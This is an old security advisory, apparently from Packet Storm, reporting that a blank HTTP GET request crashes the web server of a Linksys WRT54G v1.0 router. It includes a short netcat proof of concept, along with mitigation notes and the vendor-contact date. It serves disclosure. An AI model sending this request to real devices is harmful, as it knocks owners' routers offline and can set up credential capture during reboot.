Sending a blank GET request to a Linksys WRT54G v1.0 (firmware v 1.42.3) router results in a denial of service.
986a4c9134cb217705aa68dacd125d9dff813dac0af519f895c98449cde6ce59Linksys WRT54G Denial of Service Vulnerability
carbon@techcentric.net - 12/02/03
System(s)
===========
Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)
Detail(s)
===========
Sending a blank GET request to the router on port 80 (or 8080) halts the
embedded webserver. This may allow an attacker to force the owner to
reboot the router, allowing them to gain sensitive information during router
authentication.
Exploitation
============
user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$
Solution(s)
============
- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and
performing any authentication.
- Wait for a vendor patch :)
Status
============
Vendor contacted on 12/03/03.
!HAPPY HOLIDAYS!
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed